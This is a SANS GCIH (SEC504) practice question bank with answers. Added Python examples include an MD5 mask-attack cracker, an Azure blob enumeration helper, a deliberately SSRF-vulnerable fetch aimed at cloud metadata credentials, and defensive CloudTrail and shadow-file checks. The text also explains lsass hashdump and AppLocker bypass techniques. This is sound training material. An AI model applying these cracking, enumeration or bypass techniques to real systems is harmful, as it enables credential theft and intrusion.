SANS GCIH (SEC504)


Where are password hashes generally stored on modern UNIX and Linux systems? A) /etc/services B) /etc/shadow C) /etc/security D) /etc/system

B) /etc/shadow

When performing reconnaissance, what data is collected before sending any packets to the target? A) Open ingress ports B) Open-source intelligence C) A network diagram D) Open egress ports

B) Open-source intelligence

If you believe your system has been the victim of a rootkit attack, what is the most cost-effective form of eradication? A) Restore the OS from the most recent backup. B) Reformat, reinstall, and patch the system from the original media. C) Patch and reboot the compromised system. D) Install applications from a different vendor.

B) Reformat, reinstall, and patch the system from the original media.

Which of the following tools can be used on Linux to check weak passwords using dictionary-based online password guessing? A) Hydra B) Mimikatz C) netsh D) Aircrack-ng

A) Hydra

Which components of Infrastructure as a Service (IaaS) are the cloud customer responsible for securing? A) Operating system, content, applications, services. B) Application, deployment, backend services, API. C) Applications, content. D) Storage, networking, hardware.

A) Operating system, content, applications, services. In an IaaS model, the customer is responsible for securing the operating system, content, applications, and services. The cloud provider is responsible for securing the storage, hardware, and networking.

What are the phases of incident handling, in order, in the classic six-step incident response process? A) Preparation, identification, containment, eradication, recovery, and lessons learned. B) Preparation, identification, containment, eradication, recovery, and prosecution. C) Preparation, containment, eradication, recovery, retaliation, and lessons learned. D) Preparation, identification, recovery, encapsulation, eradication, and lessons learned.

A) Preparation, identification, containment, eradication, recovery, and lessons learned.

From where are OSINT data generally collected? A) Public websites and third-party API services. B) Nmap and Nessus. C) Metasploit and PowerShell Empire. D) Through exploiting a vulnerability and exfiltrating data.

A) Public websites and third-party API services.

Which of the following commands enables the forwarding of local port 8000 to host 10.10.10.100 on remote TCP port 80 through SSH? A) ssh -L 8000:10.10.10.100:80 [email protected] B) ssh -L 8000:10.10.10.10:80 [email protected] C) ssh -L 80:10.10.10.10:8000 [email protected] D) ssh -L 80:10.10.10.100:8000 [email protected]

A) ssh -L 8000:10.10.10.100:80 [email protected]

After an attacker has compromised an AWS instance, which of the following commands will the attacker use to list accessible S3 buckets? A) aws list buckets s3 B) aws s3 ls C) aws list s3 D) aws s3 buckets

B) aws s3 ls

Which attacker framework requires a hook to be loaded on an XSS-vulnerable website and has modules that allow an attacker to use the victim's browser to scan ports or deliver exploits? A) XSS Shell B) Nikto C) BeEF D) Jikto

C) BeEF An attacker can use BeEF to launch attacks on victims. In order for the attack to be delivered, the victim must execute the BeEF hook (a JavaScript file that is available on the BeEF server).

What tool can be used to efficiently scan large IP ranges, such as cloud service provider IP ranges? A) ping B) Nmap C) Masscan D) wget

C) Masscan

Which of the following tools is generally used by threat actors to extract victim passwords from memory dump files? A) Mimikatz B) Procdump C) Secretsdump D) WCE

A) Mimikatz

What method can attackers use to increase their chances of getting into a system without locking user accounts? A) Hash table B) Password spraying C) Crypto smashing D) Password guessing

B) Password spraying

An organization is concerned with drive-by attacks and has invested time and money to develop a strategic threat intelligence capability that monitors attack trends. In which phase of incident response does this occur? A) Recovery B) Preparation C) Eradication D) Containment

B) Preparation

Which step do non-discriminating attackers skip? A) Cleaning up tracks B) Reconnaissance C) Maintaining persistence D) Scanning

B) Reconnaissance

Which of the following tools can be used for executing code through unusual means to bypass AppLocker? A) DLL Load Events B) Process Hacker C) InstallUtil D) Process Creation

C) InstallUtil AppLocker intercepts process creation, PowerShell script execution, and DLL load events in the Application Identity (appidsvc) service. When a program executes, the Application Identity service checks that it is in the allow list before allowing execution to continue. The .NET Install Utility (InstallUtil) can install and uninstall Windows programs from the command line and includes functionality to launch executables via reflection. AppLocker does not sufficiently validate the source of the reflection execution, so an attacker can run arbitrary code under the allow-listed, Microsoft-signed InstallUtil binary.

Which Hashcat attack mode lends itself well to password cracking when the target company's password complexity policy is known? A) Single crack B) Combinator C) Mask D) Straight

C) Mask The Hashcat brute-force attack (attack mode 3, commonly referred to as a mask attack) requires you to specify the format of the password you wish to brute force. Instead of using a word list, Hashcat exhaustively tries every candidate that matches the mask, where each position is either a charset placeholder (?l lowercase, ?u uppercase, ?d digit, ?s symbol, ?a any printable) or a fixed literal character. A known complexity policy (for example, one uppercase letter, several lowercase letters, digits, and a symbol) translates directly into a mask and cuts the keyspace by orders of magnitude compared with trying every printable character at every position.
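As an added example (not hashcat's code and not part of the SEC504 material), the following Python reproduces the mask mechanics described in the answer: hashcat's built-in charsets, expansion of a mask into per-position charsets, the keyspace calculation, and an exhaustive run against one raw MD5 hash. The policy mask and the target hash are constructed for the demonstration; custom charsets (?1 to ?4) are not modelled.

```python
"""Hashcat-style mask attack (-a 3), written as an illustration; not hashcat code."""
import hashlib
import itertools
import string

# hashcat built-in charsets (custom ?1-?4 are not modelled here)
SPECIAL = " " + string.punctuation          # ?s: space plus 32 punctuation marks = 33
CHARSETS = {
    "l": string.ascii_lowercase,            # ?l  26
    "u": string.ascii_uppercase,            # ?u  26
    "d": string.digits,                     # ?d  10
    "s": SPECIAL,                           # ?s  33
    "a": string.ascii_lowercase + string.ascii_uppercase + string.digits + SPECIAL,  # ?a 95
}


def parse_mask(mask):
    """Expand a mask into one charset string per password position.
    '?l' etc. select a built-in charset, '??' is a literal '?', and any
    other character is a fixed literal at that position."""
    positions = []
    i = 0
    while i < len(mask):
        ch = mask[i]
        if ch != "?":
            positions.append(ch)
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("mask ends with a dangling '?'")
        key = mask[i + 1]
        if key == "?":
            positions.append("?")
        elif key in CHARSETS:
            positions.append(CHARSETS[key])
        else:
            raise ValueError(f"unknown charset ?{key}")
        i += 2
    return positions


def keyspace(mask):
    """Number of candidates the mask generates (what hashcat reports as keyspace)."""
    n = 1
    for charset in parse_mask(mask):
        n *= len(charset)
    return n


def candidates(mask):
    """Yield every candidate matching the mask, leftmost position varying slowest."""
    for combo in itertools.product(*parse_mask(mask)):
        yield "".join(combo)


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def crack_md5(target_hex, mask):
    """Exhaust the mask against one raw MD5 hash; return the plaintext or None."""
    target = target_hex.lower()
    for cand in candidates(mask):
        if md5_hex(cand) == target:
            return cand
    return None


if __name__ == "__main__":
    # A policy of "one uppercase, three lowercase, two digits, one symbol" maps to
    # this mask; compare its keyspace with 7 positions of ?a (95**7).
    policy_mask = "?u?l?l?l?d?d?s"
    print(policy_mask, "keyspace:", keyspace(policy_mask), "vs ?a x7:", 95 ** 7)
    # Constructed target with a short mask so the demo finishes quickly.
    target = md5_hex("xy73!")
    print("cracked:", crack_md5(target, "?l?l?d?d!"))
```

The keyspace function is the number to look at before starting a job: the policy mask above is about 1.5 billion candidates, against roughly 7e13 for seven unrestricted printable characters, which is the whole point of feeding a known policy into a mask.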

Which of the following is a persistence goal for attackers? A) Identify vulnerable services. B) Find the closest path to domain admin. C) Preserve privileges. D) Enumerate users and groups.

C) Preserve privileges.

An investigator identifies the following POST request. Which log recorded the activity? 1583050850.951 185 192.168.40.123 TCP_MISS/200 1856 POST https://update.googleapis.com/service/update2? -ORIGINAL_DST/172.219.10.153 text/xml A) Switch access log B) Regshot event log C) Proxy access log D) Windows event log

C) Proxy access log

Nmap sweeps through each target address before launching a port scan. When running without root privileges on a Linux machine, what type of TCP packet does it send to port 80? A) RST B) FIN C) SYN D) ACK

C) SYN

What are the components of a TCP three-way handshake, listed in the correct sequence? A) SYN, ACK, SYN B) SYN, ACK, SYN-ACK C) SYN, SYN-ACK, ACK D) SYN-ACK, ACK-SYN

C) SYN, SYN-ACK, ACK

An employee opens a malicious attachment that exploits an unpatched vulnerability. The Meterpreter payload launches and connects to TCP port 443 of an attacker-controlled IP address. The organization's firewall permits outbound connections to any IP address on TCP port 443. Which security device could still prevent the attacker from taking control of the system? A) Static firewall B) Network access controller C) Web proxy D) Stateful inspection firewall

C) Web proxy

Which command can be used to find Azure storage instances? A) bucket_finder.rb words --download B) gcpbucketbrute.py -u -k names C) basicblobfinder.py namelist D) gsutil ls gs://findit

C) basicblobfinder.py namelist Basic Blob Finder is a tool used to scan for and identify Azure Blobs. Since Azure Blobs are identified by an account name and a container name, Basic Blob Finder accepts a list of strings, optionally separated by a colon. Entries of a single string are used as both the account name and the container name; entries with a colon delimit the account name and the container name. Basic Blob Finder will identify publicly accessible Azure Blobs and enumerate the files in the Blob.

Which of the following Living Off the Land (LotL) tools can be used instead of cURL or Wget? A) wmic B) schtasks C) certutil D) cmd

C) certutil With limited options on what can be executed on a compromised system, attackers often turn to a technique known as living off the land (LOL). The attacker changes techniques to accomplish goals using what is allowed on the system. For example, if an attacker needs to download a script from a staging website, they do not need to upload and run cURL or Wget, as that can be accomplished using the built-in, Microsoft-signed, Certutil utility.

During an incident response, you notice that the following command was issued. What was being done? C:\> net localgroup administrators A) The list of user accounts in the administrators group was being displayed. B) The localgroup was being added to the administrators group. C) The list of user accounts in the localgroup and administrators group was being displayed. D) Info was being displayed for the localgroup and administrators user accounts.

A) The list of user accounts in the administrators group was being displayed.

Which SQL clause can be used by an attacker to combine new SQL queries with the prior query results in an SQL injection attack? A) UNION B) COMBINE C) MERGE D) ADD

A) UNION

Which of the following can be an effective defense against SQL injection attacks? A) Using parameterized queries. B) Filtering user input at the client side. C) Ensuring all data are HTML-encoded. D) Filtering user input with quotation of double-quote (" ") only.

A) Using parameterized queries. Developers should build their web applications to use parameterized queries (prepared statements), as opposed to building SQL statements through string concatenation. A bound parameter is always treated as data, never as SQL, so injection through that parameter is eliminated; parameterization does not cover identifiers such as table or column names built from user input, which still need an allow list. Parameterized queries are also simpler for most programmers and let the database reuse the prepared query plan.

Why is performing memory analysis on RAM images a staple of investigations? A) Valuable information may exist in RAM, which might not be found on disk. B) Speed - Evidence from a RAM image will match disk content. C) RAM provides more consistent images than disk. D) It's easier to look for historical information in RAM than on disk.

A) Valuable information may exist in RAM, which might not be found on disk.

Which type of system is most commonly used to investigate malware? A) Virtual machine B) Day-to-day host C) Thick client D) Production system

A) Virtual machine

DeepBlueCLI searches which of the following to find unusual behavior or characteristics? A) Windows event logs B) Windows registry hives C) Windows running processes D) Windows Volume Shadow Copy

A) Windows event logs

Real Intelligence Threat Analytics (RITA) detects known and yet-undiscovered attacker C2. What is the type of input that should be passed to RITA? A) Zeek logging data. B) Real-time network traffic. C) Packet capture files. D) Snort logging data.

A) Zeek logging data.

What gives an attacker all records associated with a DNS domain? A) Zone transfer B) Reverse lookup C) DNS lookup D) Record transfer

A) Zone transfer

What is the endpoint URL format for storage accounts in Microsoft Azure? A) https://ACCOUNTNAME.blob.core.windows.net/CONTAINERNAME B) https:// CONTAINERNAME.blob.windows.com/ C) https://s3.azure.com/BUCKETNAME D) https://www.microsoft.com/storage/v1/b/BUCKETNAME

A) https://ACCOUNTNAME.blob.core.windows.net/CONTAINERNAME
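The Basic Blob Finder input convention from the Azure question earlier ("account" or "account:container" entries) and the endpoint format in this answer fit together in a few lines. The following is an added example, not Basic Blob Finder's own code: it validates candidate names against Azure's naming rules, builds the anonymous container-listing URL, and parses the XML that a listable container returns. Nothing touches the network; the listing is constructed in the shape of Azure's List Blobs response, and the account and container names are made up.

```python
"""Added example: candidate Azure Blob listing URLs and parsing of a listing response."""
import re
import xml.etree.ElementTree as ET

# Azure naming rules: account 3-24 lowercase alphanumerics; container 3-63 lowercase
# alphanumerics and hyphens, starting and ending with a letter or digit, no "--".
ACCOUNT_RE = re.compile(r"^[a-z0-9]{3,24}$")
CONTAINER_RE = re.compile(r"^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$")


def parse_entry(entry):
    """'acme' -> ('acme', 'acme'); 'acme:backups' -> ('acme', 'backups')."""
    account, sep, container = entry.strip().partition(":")
    return account, (container if sep else account)


def valid_names(account, container):
    return (bool(ACCOUNT_RE.match(account)) and bool(CONTAINER_RE.match(container))
            and "--" not in container)


def listing_url(account, container):
    """Anonymous List Blobs request for one container (restype=container&comp=list)."""
    return f"https://{account}.blob.core.windows.net/{container}?restype=container&comp=list"


def candidate_urls(entries):
    """URLs worth probing, skipping entries that could never be valid Azure names."""
    urls = []
    for entry in entries:
        account, container = parse_entry(entry)
        if valid_names(account, container):
            urls.append(listing_url(account, container))
    return urls


def parse_listing(xml_text):
    """Return [(blob_name, size_bytes)] from a List Blobs response. An HTTP 200
    with this body means anyone can enumerate the container."""
    root = ET.fromstring(xml_text)
    blobs = []
    for blob in root.iter("Blob"):
        name = blob.findtext("Name")
        size = blob.findtext("Properties/Content-Length")
        blobs.append((name, int(size) if size else None))
    return blobs


# Constructed response in the shape Azure returns for a listable container.
SAMPLE_LISTING = """<EnumerationResults ServiceEndpoint="https://acme.blob.core.windows.net/" ContainerName="backups">
  <Blobs>
    <Blob><Name>db-2024-01.bak</Name><Properties><Content-Length>734003200</Content-Length></Properties></Blob>
    <Blob><Name>web.config</Name><Properties><Content-Length>2048</Content-Length></Properties></Blob>
  </Blobs>
  <NextMarker />
</EnumerationResults>"""

if __name__ == "__main__":
    for url in candidate_urls(["acme", "acme:backups", "Acme_Corp", "acme:x"]):
        print(url)
    print(parse_listing(SAMPLE_LISTING))
```

A non-empty NextMarker element means the listing is paginated and the next request must pass it back as the marker query parameter, so a file count taken from the first page alone understates the exposure.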

Which of these tools is available online to run a malware specimen through a sandbox to record activities performed by the malware in a virtual environment? A) Domain Tools B) Hybrid Analysis C) VirusTotal D) SandBoxer

B) Hybrid Analysis Hybrid Analysis allows you to upload a malware specimen and choose a virtual machine environment in which to run the specimen. Hybrid Analysis records how the malware behaves within the virtualized environment.

In which mode does John the Ripper perform a brute-force password-cracking attack? A) Wordlist mode B) Incremental mode C) External mode D) Single-crack mode

B) Incremental mode

In what way is logging API access to a cloud environment a major incident response benefit? A) It helps to provide detailed insight into network activity for analysis. B) It helps to understand the scope of the breach and the actions taken by an attacker. C) It provides verification of breached data access. D) It provides full packet capture visibility.

B) It helps to understand the scope of the breach and the actions taken by an attacker. API access logs include all programmatic access to cloud services, identity and key use, and a record of attacker tactics used to exploit the cloud. These are the most useful data for understanding the scope of a breach and the actions taken by the attacker.

While attempting to pull hashes from memory on a Windows 10 system using Meterpreter hashdump, you receive the following error: "priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect." What could you do to obtain the hashes from memory? A) Run the getprivs command in Meterpreter and then run hashdump. B) Migrate to the lsass.exe process and then run hashdump. C) Restart Metasploit with root privileges. D) Run the command again, since it sometimes takes a few tries for commands to run properly.

B) Migrate to the lsass.exe process and then run hashdump. With modern changes to how Microsoft protects password hash data, the hashdump command will fail with the error "priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect." To work around this problem, first you have to move the Meterpreter instance from the initial process to one running inside of lsass.exe.

What are two basic approaches commonly employed when investigating malware? A) Running a penetration test and running a vulnerability scan. B) Monitoring the environment and examining code. C) Taking the environment offline and restoring from backups. D) Performing a risk assessment and confirming a possible exploit type.

B) Monitoring the environment and examining code.

Which of the following is a program that can move data across a network using user-assigned TCP or UDP ports and works on Windows, Mac, and Linux? A) Nmap B) Netcat C) ping D) SCP

B) Netcat

Which of the following attacks could have a significant impact on cloud targets as it could disclose instance metadata? A) Cookie harvesting B) SSRF C) SQL injection D) XSS

B) SSRF Server-side request forgery (SSRF) attacks are not unique to cloud targets, since they can expose any web application functionality, but this vulnerability introduces greater risk when applied against cloud targets. For many web applications, the web server will accept input from the user and use the input to form a web request of its own. For example, if a user supplies a link to an image file as part of user profile avatar creation, the web server will accept that URL and request the image from the target web server. If an attacker can manipulate the input to get the server to make arbitrary HTTP requests, then the server is vulnerable to SSRF attacks. This can lead to a web server compromise, possibly disclosing sensitive cloud authentication tokens through the Instance Metadata Service (IMDS). On AWS, IMDSv2 reduces this exposure because it requires a session token obtained with a PUT request before metadata can be read, which a simple GET-based SSRF cannot perform.
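The avatar-fetch scenario in this answer, as an added example that is not part of the SEC504 material: the vulnerable pattern beside a hardened URL check. The resolver is injectable so the check can run offline; fake_resolver, its hostnames and its addresses are constructed for the demo, and the metadata addresses are the well-known AWS IMDS endpoints.

```python
"""Added example: SSRF-prone avatar fetch and a resolution-aware URL check."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def fetch_avatar_vulnerable(url):
    """What the vulnerable server does: fetch whatever URL the user supplied.
    http://169.254.169.254/latest/meta-data/iam/security-credentials/ returns
    the instance role's credentials on AWS when IMDSv1 is enabled."""
    import urllib.request
    return urllib.request.urlopen(url).read()


def is_public_address(ip_text):
    addr = ipaddress.ip_address(ip_text)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped          # ::ffff:169.254.169.254 is still the IMDS
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def system_resolver(host):
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


FAKE_DNS = {                                  # constructed for the offline demo
    "cdn.example.com": ["93.184.216.34"],
    "evil.example.com": ["93.184.216.34", "169.254.169.254"],   # one bad answer is enough
    "localhost": ["127.0.0.1"],
}


def fake_resolver(host):
    if host not in FAKE_DNS:
        raise OSError(f"NXDOMAIN {host}")
    return FAKE_DNS[host]


def check_fetch_url(url, resolver=system_resolver):
    """Return (ok, reason). Every address the host resolves to must be public."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        addresses = [str(ipaddress.ip_address(host))]   # IP literal: no DNS at all
    except ValueError:
        try:
            addresses = resolver(host)
        except OSError:
            return False, f"{host} does not resolve"
    if not addresses:
        return False, f"{host} has no addresses"
    for address in addresses:
        if not is_public_address(address):
            return False, f"{host} resolves to non-public {address}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ["https://cdn.example.com/avatar.png",
                      "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
                      "http://evil.example.com/avatar.png"]:
        print(candidate, check_fetch_url(candidate, fake_resolver))
```

Two things the check alone does not cover: the fetch must connect to the address that was vetted rather than resolving the name a second time (otherwise DNS rebinding defeats it), and HTTP redirects must be disabled or re-checked, since a public host that 302-redirects to 169.254.169.254 bypasses every test above.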

What step should always be taken first during an incident? A) Identifying which systems are unpatched. B) Verifying whether an incident occurred. C) Determining which threat intelligence feeds to query. D) Choosing which systems to rebuild.

B) Verifying whether an incident occurred.

Which of the following is an important consideration when using Sqlmap? A) You must supply an error-generating URL. B) You must always put the URL in quotes. C) The use of quotes on the URL is optional. D) Database tables are dropped unless the --no-drop option is used.

B) You must always put the URL in quotes. Always put the URL in quotes. Many URLs contain ampersands (&). If the user does not put the URL in quotes, the shell prompt will interpret the ampersand as a shell meta-character and will not supply all the data parameters for SQL injection testing to Sqlmap.

After an attacker has compromised an AWS instance, which of the following commands serves as a basic access test that attackers use to identify the username associated with stolen access keys? A) aws iam get-caller-identity B) aws sts get-caller-identity C) aws sts get-username D) aws sts get-user-id

B) aws sts get-caller-identity
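The access test in this answer, the bucket listing from the earlier "aws s3 ls" question, and the API-logging answer above all meet in CloudTrail. The following is an added example, not part of the SEC504 material: it flags an access key used from an unknown source address whose calls include GetCallerIdentity, and returns the reconnaissance calls that followed in time order. The records are constructed in CloudTrail's JSON shape; the key IDs are AWS documentation placeholders and the addresses are reserved example ranges.

```python
"""Added example: spotting stolen-key access tests and enumeration in CloudTrail."""
from collections import defaultdict

# API calls that map to an attacker's first moves with a stolen key.
RECON_CALLS = {
    "GetCallerIdentity", "ListBuckets", "ListUsers", "ListRoles",
    "GetAccountSummary", "DescribeInstances", "ListSecrets", "ListFunctions",
}


def _record(time, key, ip, source, name, user="deploy-bot", agent="aws-cli/2.15.0"):
    return {
        "eventVersion": "1.08",
        "eventTime": time,
        "eventSource": source,
        "eventName": name,
        "sourceIPAddress": ip,
        "userAgent": agent,
        "userIdentity": {"type": "IAMUser", "userName": user, "accessKeyId": key},
    }


# Constructed trail: a CI key used normally from 10.0.1.5, then the same key
# used from an external address for GetCallerIdentity, ListBuckets, ListUsers.
SAMPLE_TRAIL = {"Records": [
    _record("2024-03-01T10:00:00Z", "AKIAIOSFODNN7EXAMPLE", "10.0.1.5", "sts.amazonaws.com", "GetCallerIdentity"),
    _record("2024-03-01T10:00:05Z", "AKIAIOSFODNN7EXAMPLE", "10.0.1.5", "s3.amazonaws.com", "PutObject"),
    _record("2024-03-01T11:02:13Z", "AKIAIOSFODNN7EXAMPLE", "198.51.100.23", "sts.amazonaws.com", "GetCallerIdentity"),
    _record("2024-03-01T11:02:20Z", "AKIAIOSFODNN7EXAMPLE", "198.51.100.23", "s3.amazonaws.com", "ListBuckets"),
    _record("2024-03-01T11:02:31Z", "AKIAIOSFODNN7EXAMPLE", "198.51.100.23", "iam.amazonaws.com", "ListUsers"),
    _record("2024-03-01T11:03:00Z", "AKIAI44QH8DHBEXAMPLE", "198.51.100.99", "s3.amazonaws.com", "PutObject", user="uploader"),
]}


def detect_key_recon(trail, known_ips):
    """Flag each (access key, source IP) pair outside known_ips whose calls
    include GetCallerIdentity; return the recon calls in time order."""
    by_key_ip = defaultdict(list)
    for rec in trail["Records"]:
        ident = rec.get("userIdentity", {})
        key = ident.get("accessKeyId")
        ip = rec.get("sourceIPAddress")
        if not key or ip in known_ips:
            continue
        by_key_ip[(key, ip)].append(rec)
    findings = []
    for (key, ip), recs in sorted(by_key_ip.items()):
        recs.sort(key=lambda r: r["eventTime"])
        recon = [r["eventName"] for r in recs if r["eventName"] in RECON_CALLS]
        if "GetCallerIdentity" not in recon:
            continue
        findings.append({
            "access_key": key,
            "source_ip": ip,
            "user": recs[0]["userIdentity"].get("userName"),
            "first_seen": recs[0]["eventTime"],
            "events": recon,
        })
    return findings


if __name__ == "__main__":
    for finding in detect_key_recon(SAMPLE_TRAIL, known_ips={"10.0.1.5"}):
        print(finding)
```

The known-IP baseline is the part to get right in production: build it from the key's own history (CI runners, NAT gateways) rather than a hand-typed set, and treat a new userAgent for an old key as a second signal alongside the new address.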

Who should make the decision of when to put a system back into production? A) Systems administrators B) Business team C) Security team D) Data owner

B) Business team

An attacker downloads a PDF from a target's website and wants to exploit a vulnerability in the PDF. What tool can the attacker use to view information about the tool that was used to create the PDF? A) Exiftool B) Pdflist C) Exifpdf D) Listpdf

A) Exiftool

What does it mean for a cloud bucket to be listable? A) Files can be both enumerated and downloaded. B) Files can only be downloaded. C) Files can be uploaded. D) Files can only be enumerated.

A) Files can be both enumerated and downloaded. If a bucket is listable, an attacker can enumerate and download all the files. This represents an information disclosure threat.

Which of the following is a challenge of working with OSINT data? A) Converting different HTML and XML versions. B) Properly decrypting various data sources. C) Collecting from numerous and disparate data sources. D) Using bitcoin to pay for access to data services.

C) Collecting from numerous and disparate data sources.

What tool is used to record the state of the registry before and after malware is executed on an analysis system? A) Regshot B) Ollydbg C) Wireshark D) Regripper

A) Regshot

Which of the following tools uses a "high-low" strategy, splitting a file into pieces and scanning it repeatedly until the smallest data chunk that triggers a threat alert is found? A) YARA B) DefenderCheck C) Veil framework D) msfvenom

B) DefenderCheck

Which Metasploit payload shovels a shell back to the attacker on a TCP port? A) Inject control B) Port binder C) Bind shell D) Reverse shell

D) Reverse shell

The adversary tactics, techniques, and procedures from the MITRE ATT&CK Framework are based on which of the following? A) Observations from real-world attacks. B) Open Web Application Security Project (OWASP). C) Cutting-edge security research papers. D) Vulnerability databases.

A) Observations from real-world attacks.

Which of the following PowerShell cmdlets can provide useful information to identify attacker WMI-based persistence? A) Get-Autoruns B) Get-WMIObject C) Get-WMIEvent D) Get-WMI

B) Get-WMIObject The Windows Get-WMIObject cmdlet can provide information about WMI event subscriptions that will help defenders identify any WMI-based persistence on Windows endpoints.

The following line was extracted from the /etc/shadow file of a Linux system. Which of the following hash encryption functions was used by the system to generate the output? sec504:$6$1ArFQuUX$qhCcp4hKJvWxf47bm3QiFs3CldfvKy/z28wN24GuOwBfcgOF8j2iYgll5eFPyMQ0Hzf.PyXrIqE3FpnF4vdPq.:17317:0:99999:7::: A) SHA-512 B) SHA-256 C) Blowfish D) MD5

A) SHA-512 When looking in the /etc/shadow file, the password hash is the second colon-delimited field. $6 is used for SHA-512, $5 is used for SHA-256, $2 is used for Blowfish, and $1 is used for MD5.
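A parser for the format in this answer, added here as an example that is not part of the SEC504 material: it splits the nine colon-delimited fields, identifies the crypt(3) scheme from the $id$ prefix, pulls out the salt and rounds, and flags entries a responder would want to see. The sec504 line is the one from the question; the other shadow lines are constructed (the hash digests in them are placeholders, not real hashes).

```python
"""Added example: /etc/shadow parsing and a quick audit of weak or empty entries."""

# crypt(3) scheme identifiers; $2a/$2b/$2y are bcrypt variants, $y$ is yescrypt.
SCHEMES = {
    "1": "MD5-crypt",
    "2": "bcrypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "SHA-256-crypt",
    "6": "SHA-512-crypt",
    "y": "yescrypt",
}
DEFAULT_ROUNDS = {"5": 5000, "6": 5000}   # sha256/512-crypt default when no rounds= is given
WEAK = {"MD5-crypt"}

FIELDS = ["user", "hash", "last_change", "min_days", "max_days",
          "warn_days", "inactive_days", "expire", "reserved"]


def parse_hash(field):
    """Split '$id$[rounds=N$]salt$digest' (and the bcrypt/yescrypt layouts) into parts."""
    info = {"algorithm": None, "salt": None, "rounds": None, "digest": None, "status": "hashed"}
    if field == "":
        info["status"] = "empty"            # no password at all
        return info
    if field[0] in "!*":
        info["status"] = "locked"           # '!' or '*' prefix disables password login
        return info
    if not field.startswith("$"):
        info["algorithm"] = "DES-crypt"     # legacy 13-character traditional crypt
        return info
    parts = field.split("$")[1:]            # drop the empty string before the first '$'
    scheme_id = parts[0]
    info["algorithm"] = SCHEMES.get(scheme_id, f"unknown ${scheme_id}$")
    rest = parts[1:]
    if scheme_id.startswith("2") and len(rest) == 2:
        info["rounds"] = 2 ** int(rest[0])              # bcrypt stores log2(cost)
        info["salt"], info["digest"] = rest[1][:22], rest[1][22:]
        return info
    if scheme_id == "y" and rest:
        info["params"], rest = rest[0], rest[1:]       # yescrypt: $y$<params>$<salt>$<hash>
    if rest and rest[0].startswith("rounds="):
        info["rounds"] = int(rest[0].split("=", 1)[1])
        rest = rest[1:]
    else:
        info["rounds"] = DEFAULT_ROUNDS.get(scheme_id)
    if len(rest) >= 2:
        info["salt"], info["digest"] = rest[0], rest[1]
    return info


def parse_shadow_line(line):
    values = line.rstrip("\n").split(":")
    if len(values) != 9:
        raise ValueError(f"expected 9 colon-separated fields, got {len(values)}")
    entry = dict(zip(FIELDS, values))
    for key in FIELDS[2:]:
        entry[key] = int(entry[key]) if entry[key] else None
    entry.update(parse_hash(entry["hash"]))
    return entry


def audit(lines):
    """Return (user, finding) pairs worth a second look."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        entry = parse_shadow_line(line)
        if entry["status"] == "empty":
            findings.append((entry["user"], "empty password field"))
        elif entry["status"] == "hashed" and entry["algorithm"] in WEAK:
            findings.append((entry["user"], f"weak scheme {entry['algorithm']}"))
        elif entry["status"] == "hashed" and entry["algorithm"] == "DES-crypt":
            findings.append((entry["user"], "legacy DES-crypt (8-character limit)"))
    return findings


# Line from the question, followed by constructed entries with placeholder digests.
SEC504_LINE = ("sec504:$6$1ArFQuUX$qhCcp4hKJvWxf47bm3QiFs3CldfvKy/z28wN24GuOwBfcgOF8j2iYgll5eFPyMQ0Hzf."
               "PyXrIqE3FpnF4vdPq.:17317:0:99999:7:::")
SAMPLE_SHADOW = [
    SEC504_LINE,
    "root:!:17317:0:99999:7:::",
    "legacy:$1$saltsalt$xxxxxxxxxxxxxxxxxxxxxx:16000:0:99999:7:::",
    "kiosk::18000:0:99999:7:::",
    "svc:$6$rounds=100000$abcdefgh$Zz9xQ2wKplaceholderdigest:18500:0:99999:7:::",
]

if __name__ == "__main__":
    entry = parse_shadow_line(SEC504_LINE)
    print(entry["user"], entry["algorithm"], entry["salt"], entry["rounds"])
    print(audit(SAMPLE_SHADOW))
```

The rounds value matters for cracking estimates: sha512-crypt at the default 5,000 rounds is several thousand times slower per guess than raw MD5, and an explicit rounds=100000 slows it twenty-fold again, which is why a hashcat or John benchmark for mode 1800 is not transferable between systems with different round counts.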

What is the following Google search designed to do? wireless site:somecompany.net A) Search for all instances of the term "wireless" on the somecompany.net website B) Display all pages containing both the terms "somecompany.net" and "wireless site" C) Find pages similar to somecompany.net that also mention the term "wireless" D) Display all pages with the term "wireless" in them that link to somecompany.net

A) Search for all instances of the term "wireless" on the somecompany.net website

When Netcat is used in client mode, messages from the tool itself associated with the connection are sent to which of the following? A) Standard error B) Standard input C) Standard output D) Standard input and output

A) Standard error Messages from Netcat associated with the connection (such as error conditions) are sent to standard error. This makes Netcat very flexible, because errors will not be put in stdout and therefore will not corrupt anything you want to capture from the network.

A system administrator pulled the following password hashes from a web application. Based on these password hashes, what do you know? alice:26ab0db90d72e28ad0ba1e22ee510510 barry:b026324c6904b2a9cb4b88d6d61c81d1 becky:6d7fce9fee471194aa8b5b6e47267f03 cindy:869c5758c412a4b16c682c2f983a804f peter:869c5758c412a4b16c682c2f983a804f leann:869c5758c412a4b16c682c6af517398f sarah:26ab0db93c9c6e1b9b6252c8395efdc1 vivek:31d30eea8d0968d6458e0ad0027c9f80 A) Cindy and Peter have identical passwords. B) Each hash value was calculated using a different salt value. C) Peter and Leann have passwords that are similar. D) The passwords were hashed with the HMAC-MD5 algorithm.

A) Cindy and Peter have identical passwords.
